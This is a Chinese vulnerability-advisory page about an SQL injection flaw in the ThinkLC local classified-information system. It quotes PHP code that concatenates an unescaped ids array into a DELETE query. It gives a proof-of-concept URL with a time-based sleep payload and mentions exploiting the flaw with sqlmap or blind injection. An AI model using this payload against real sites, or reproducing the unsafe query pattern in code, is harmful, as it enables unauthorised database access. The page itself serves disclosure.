首页 > 漏洞预警和分析 > ThinkLC地方分类信息系统(sql注入)

ThinkLC地方分类信息系统(sql注入)

[2018.02.05]

if ( !empty( $_REQUEST['action'] ) && $_REQUEST['action'] == 'delete' && !empty( $_REQUEST['ids'] ) && is_array( $_REQUEST['ids'] ) && count( $_REQUEST['ids'] ) > 0 ) {

    $query_handler -> db -> query( "DELETE FROM " . saxue_dbprefix( "fav" ) . " WHERE fid IN(" . implode( ',', $_REQUEST['ids'] ) . ") AND uid=" . $_SESSION['saxueUserId'] );

    saxue_jumppage( 'myfav.php?menuid=' . $_REQUEST['menuid'] . '&type=' . $_REQUEST['type'] . '&page=' . $_REQUEST['page'] );



未对ids进行类型声明并采用IN带入查询不受转义影响





Poc:/member/myfav.php?action=delete&ids[]=1)or (select sleep(1))#


采用sqlmap api进行注入




 

也可以采用根据删除是否成功的回显来注入,非延时。

 


北京通和实益电信科学技术研究所有限公司 版权所有 京ICP备15030238号-1